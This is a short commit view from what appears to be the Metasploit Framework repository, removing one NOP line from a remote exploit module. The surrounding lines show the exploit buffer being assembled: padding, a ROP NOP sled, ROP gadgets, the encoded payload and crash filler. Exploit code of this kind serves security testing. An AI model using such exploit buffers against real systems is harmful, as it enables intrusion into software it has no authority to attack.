Remove unnecessary NOPs

bug/bundler_fix
sgabe 2014-02-11 23:48:54 +01:00
parent 12471660e9
commit 7fc3511ba9
1 changed files with 0 additions and 1 deletions

View File

@ -108,7 +108,6 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << rand_text_alpha_upper(56)
sploit << rop_nops(8)
sploit << rop_gadgets
sploit << make_nops(4)
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # make it crash